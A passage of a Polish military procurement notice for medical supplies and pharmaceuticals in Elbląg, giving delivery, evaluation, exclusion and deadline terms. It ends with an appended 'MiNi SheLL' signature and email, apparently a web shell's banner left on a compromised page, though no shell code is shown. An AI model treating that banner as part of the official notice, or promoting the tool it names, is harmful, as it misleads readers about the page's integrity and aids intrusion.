wyrobów medycznych, systemów i zestawów zabiegowych wydanych bezpłatnie (Dz. U 2022 poz. 2099).<br/>3.	Szczegółowe zestawienie asortymentu wchodzącego w skład przedmiotu zamówienia stanowi załączniki nr 1e do Opisu Przedmiotu Zamówienia (OPZ)<br/>(94 pozycje asortymentowe). <br/>W odniesieniu do asortymentów stanowiących komponenty PRS, PRM, IPMED oraz TL określonych w załączniku nr 1e do OPZ, Zamawiający wymaga by spełniały one wymagania odpowiednio do wskazanych Wymagań Eksploatacyjno-Technicznych.<br/>4.	Wykonawca zobowiązany jest do dostarczania i rozładowania przedmiotu zamówienia na własny koszt i ryzyko do magazynu Sekcji Medycznej 21.Wojskowego Oddziału Gospodarczego przy ul. Kwiatkowskiego 15 w Elblągu w godzinach od 8:00 do 13:00 (w piątki 8.00 – 11.00), według każdorazowego pisemnego zamówienia przesłanego Wykonawcy.<br/>5.	Przedmiot zamówienia będzie realizowany z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w załączniku nr 1e do OPZ i w załączniku nr 2a do SWZ. <br/>Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji.<br/>6.	Zamawiający wymaga by Wykonawca dostawy dla ilości minimalnych realizował według szczegółowych zamówień, przesyłanych przez Zamawiającego określającego ilość, asortyment i jednostkę wojskową której dotyczy zamawiany przedmiot zamówienia w terminie zaoferowanym przez Wykonawcę w formularzu ofertowym (termin realizacji dostawy dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego).<br/>7.	Zamawiający wymaga by Wykonawca dostawy dla ilości maksymalnych (o ile będą realizowane) realizował według szczegółowych zamówień, przesyłanych przez Zamawiającego określającego ilość, asortyment i jednostkę wojskową której dotyczy zamawiany przedmiot zamówienia w terminie do 14 dni roboczych od przesłania przez Zamawiającego zamówienia. Za dzień roboczy przyjmuje się dni od poniedziałku do piątku.<br/>8.	Asortyment powinien być czytelnie oznakowany (nazwa, postać, kod) i opisany<br/>w języku polskim (ulotka w języku polskim). Na opakowaniach powinna znajdować się czytelna seria i data ważności.<br/>9.	Okres ważności asortymentu (oznaczenie daty przydatności na każdym opakowaniu), zgodnie z Wymaganiami Eksploatacyjno-Technicznymi (załącznik nr 1a, 1b, 1c, 1d do OPZ, odpowiednio dla danego do asortymentu), a w przypadku asortymentu bez wskazania okresu ważności w ww. Wymaganiach oraz pozostałego asortymentu, nie krótszy niż 36 miesięcy od daty produkcji, przy czym w dniu dostawy nie może być krótszy niż 80 % całkowitego okresu ważności.<br/>10.	Zamawiający zastrzega sobie możliwość zmiany w ilościach poszczególnego asortymentu <br/>objętego przedmiotem umowy, w zależności od faktycznych potrzeb jednostek i instytucji wojskowych znajdujących się na zaopatrzeniu 21. Wojskowego Oddziału Gospodarczego w Elblągu. Zmiany mogą polegać na zwiększeniu lub zmniejszeniu ilości jednego asortymentu kosztem zmniejszenia lub zwiększenie innego asortymentu objętego przedmiotem umowy.<br/> Powyższe zmiany nie mogą przekroczyć 10% ilości poszczególnych asortymentów oraz nie mogą doprowadzić do zwiększenia wartości umowy, o której mowa w §2 projektowanych postanowień umowy (załącznik nr 4 do SWZ).<br/>11.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:<br/>a)	dostarczania asortymentu zgodnie ze złożoną ofertą, spełniającego warunki dopuszczenia do obrotu i do używania na terytorium Rzeczypospolitej Polskiej oraz wszystkie europejskie i polskie wymagania i normy medyczne oraz zapewnia że przedmiot zamówienia jest wolny od jakichkolwiek wad;<br/>b)	okazania, na każde żądanie Zamawiającego, odpowiedniego certyfikatu zgodności z polską normą lub normami europejskimi, wpisu do Rejestru Produktów Leczniczych Dopuszczonych do Obrotu na terytorium Rzeczypospolitej Polskiej, certyfikatu CE, deklaracji zgodności itp.,<br/>c)	zapewnienia terminowej realizacji dostaw,<br/>d)	dostarczania asortymentu transportem spełniającym warunki określone<br/>w wymaganiach producenta w zakresie przechowywania i transportu danego asortymentu,<br/>e)	dostarczania asortymentu na własny koszt i ryzyko do magazynu 21.Wojskowego Oddziału Gospodarczego w Elblągu,<br/><br/> Szczegółowy opis części zamówienia zawiera zał. nr 1, 2a i 4 do SWZ.<br/><br/>Zamówienie będzie realizowane z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Zamawiający informuje, że jeśli ilość minimalna jest równa ilości maksymalnej oznacza to, że dla danej pozycji asortymentowej nie stosuje się prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33140000-3 - Materiały medyczne</p> <p class="mb-0">18143000-3 - Akcesoria ochronne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Umowa przewiduje wykorzystanie przez Zamawiającego prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Termin realizacji dostaw dla ilości minimalnych - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostaw dla ilości minimalnych”<br/><br/>3. W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4. W kryterium „ Termin realizacji dostaw dla ilości minimalnych” zostanie zastosowany sposób oceny ofert:<br/>Dla części zamówienia nr 1 i 2- Termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego- Liczba punktów:<br/>- do 2 dni roboczych od dnia złożenia zamówienia przez Zamawiającego -40 pkt;<br/>- od 3 do 4 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 30 pkt;<br/>- od 5 do 6 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 20 pkt;<br/>- od 7 do 8 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 10 pkt;<br/>- od 9 do 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego- 0 pkt.<br/><br/>Wykonawca otrzyma:<br/>40 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie do 2 dni roboczych;<br/>30 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 3 do 4 dni roboczych;<br/>20 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 5 do 6 dni roboczych;<br/>10 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 7 do 8 dni roboczych;<br/>0 pkt – jeżeli termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wyniesie od 9 do 10 dni roboczych.<br/><br/>UWAGA:<br/>- Maksymalny termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego wynosi do 10 dni roboczych. <br/>- W przypadku zaoferowania przez Wykonawcę terminu realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego dłuższego niż 10 dni roboczych spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/>- W przypadku braku zaznaczenia w formularzu ofertowym rubryki Zamawiający przyjmie, że zaoferowano termin realizacji dostaw dla ilości minimalnych od dnia złożenia zamówienia przez Zamawiającego od 9 do 10 dni roboczych, co będzie oznaczać uzyskanie 0 pkt w kryterium „Termin realizacji dostaw dla ilości minimalnych”.<br/>- Zaznaczenie więcej niż jednej rubryki w formularzu ofertowym (załącznik nr 2 do SWZ) spowoduje odrzucenie oferty.<br/>- Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku.<br/>- Dostawy do magazynu Zamawiającego w godz.:<br/>- poniedziałek – czwartek 8:00-13:00, <br/>- w piątek 8:00-11:00.<br/><br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6. Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu: <br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>- dla części zamówienia nr 1:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca: posiada uprawnienia do wykonywania określonej działalności zgodnie z ustawą z dnia 6 września 2021 r. Prawo farmaceutyczne (DZ. U. z 2022 poz. 2301 z późn. zm.), która nakłada obowiązek posiadania takich uprawnień i posiadania tych uprawnień przez cały okres obowiązywania umowy. W celu potwierdzenia uprawnień do wykonywania przedmiotu zamówienia należy przedstawić zezwolenie wydane przez głównego inspektora farmaceutycznego lub wojewódzkiego inspektora farmaceutycznego na prowadzenie obrotu hurtowego lub handlowego produktami leczniczymi.<br/>- dla części zamówienia nr 2: Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/><br/>c)	zdolności ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku udziału w postępowaniu.<br/><br/>d)	zdolności technicznej lub zawodowej: <br/>Zamawiający nie precyzuje warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub<br/>ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności<br/>rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w pkt 1), dokument lub dokumenty wystawione w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być<br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 2), zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w<br/>terminie wskazanym w pkt 2).<br/>5) Do podmiotów udostępniających zasoby na zasadach określonych w art. 118<br/>ustawy Pzp (jeżeli dotyczy) oraz podwykonawców niebędących podmiotami<br/>udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej Polskiej, przepisy pkt 2)<br/>i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) Dokumentów potwierdzających posiadanie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/>kopię ważnego zezwolenia wydanego przez głównego inspektora farmaceutycznego lub wojewódzkiego inspektora farmaceutycznego na prowadzenie obrotu hurtowego lub handlowego produktami leczniczymi - dotyczy części zamówienia nr 1;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych,<br/>Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca<br/>udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ.<br/>Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą<br/>to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej<br/>SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich<br/>złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od<br/>wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą<br/>to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa<br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej<br/>SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający informuje, że:<br/>1) jeżeli w dokumentacji przetargowej podano nazwy handlowe leku, znaki towarowe leku, pochodzenie leku, źródła leku lub szczególne kompozycji substancji leku, które charakteryzują produkty dostarczane przez konkretnego wykonawcę, to intencją Zamawiającego było tylko i wyłącznie przedstawienie przykładu „typu” w celu dokładnego określenia substancji czynnej lub kompozycji substancji czynnych zawartych w zamawianych lekach. Ewentualne użycie przykładowych nazw leków, znaków leków itp. oznacza tylko i wyłącznie to, że Zamawiający oczekuje zaoferowania leków zawierających te substancje czynne lub te kompozycje substancji czynnych co leki, których nazwy zostały użyte i dopuszcza zaoferowanie zarówno tych leków, jak i leków równoważnych, przez co należy rozumieć leki identyczne pod względem kompozycji substancji czynnych oraz mający te same wskazania i tę samą drogę podania przy braku różnic postaci farmaceutycznej. Standardy jakościowe leków są określone w pozwoleniach na dopuszczenie do obrotu;<br/>Wykonawca oferując równoważnik asortymentu (leku) obowiązany jest udowodnić w ofercie, że spełnia on wymagania określone przez Zamawiającego;<br/>2) jeśli w dokumentacji przetargowej podano nazwy własne, są one<br/>tylko przykładowe i nie stanowią wskazania producenta, a określają jedynie klasę produktu i jego jakość. Wykonawca może zaproponować produkt o innej nazwie (produkt równoważny), o parametrach nie gorszych niż produkt podany z nazwy i o analogicznym przeznaczeniu. <br/>Parametry techniczne (wielkości wyrażone w jednostkach miary) materiałów i urządzeń opisanych jak w zdaniu poprzedzającym należy uznać za wielkości referencyjne, które będą stanowiły kryteria zastosowane dla oceny równoważności.<br/>Zamawiający za produkt równoważny uważa produkt, który nie jest identyczny, tożsamy z produktem referencyjnym, ale posiada nie gorsze od produktu referencyjnego cechy i parametry.<br/>Wykonawca, który zastosuje rozwiązania równoważne, obowiązany jest udowodnić w ofercie, że oferowane przez niego produkty (w tym materiały i urządzenia) spełniają określone przez Zamawiającego w dokumentacji;<br/><br/>Zamawiający nie ogranicza rodzaju środków dowodowych, jakimi Wykonawca udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ.<br/>Zaleca się, aby w celu udowodnienia równoważności zastosowanych rozwiązań załączyć do oferty w szczególności dokumenty potwierdzające parametry techniczne i analizę porównawczą, z której jednoznacznie będzie wynikać, że są one w pełni równoważne do materiałów i urządzeń (również leków) wskazanych w dokumentacji.<br/>W przypadku zastosowania materiałów lub urządzeń równoważnych (również leków) do wskazanych w SWZ, w tym w Opisie przedmiotu zamówienia, Wykonawca wraz z ofertą zobowiązany jest złożyć oświadczenie dot. zastosowania materiałów lub urządzeń równoważnych (również leków) do wskazanych w SWZ, w tym w opisie przedmiotu zamówienia (oferta równoważna).<br/>W przypadku, jeżeli Wykonawca nie załączy do oferty ww. oświadczenia Zamawiający uzna, że Wykonawca nie oferuje oferty równoważnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 620,00 PLN;<br/>b) dla części zamówienia nr 2 – 1 100,00 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, stanowiące załącznik nr 3do SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia: Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje dostawy, do których realizacji te uprawnienia są wymagane.<br/>3. Zgodnie z art. 117 ust. 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy – wzór – załącznik nr 5 do SWZ.<br/>4. Zamawiający dopuszcza wniesienie wadium tylko przez lidera lub jednego <br/>z uczestników Konsorcjum, w imieniu wszystkich uczestników Konsorcjum.<br/>5. W przypadku wadium wnoszonego w formie innej niż pieniądz przez jednego z uczestników Konsorcjum w treści dokumentu wadialnego musi być wyszczególniony pełen skład Konsorcjum.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo podpisane elektronicznym podpisem, kwalifikowanym, podpisem zaufanym lub podpisem osobistym przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych.<br/>Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia znajduje się w §9 umowy stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-21 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-21 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin realizacji zamówienia:<br/>Dla części zamówienia nr 1 - 7 miesięcy od daty zawarcia umowy.<br/>Dla części zamówienia nr 2 - 7 miesięcy od daty zawarcia umowy.<br/>2. Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek opisanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com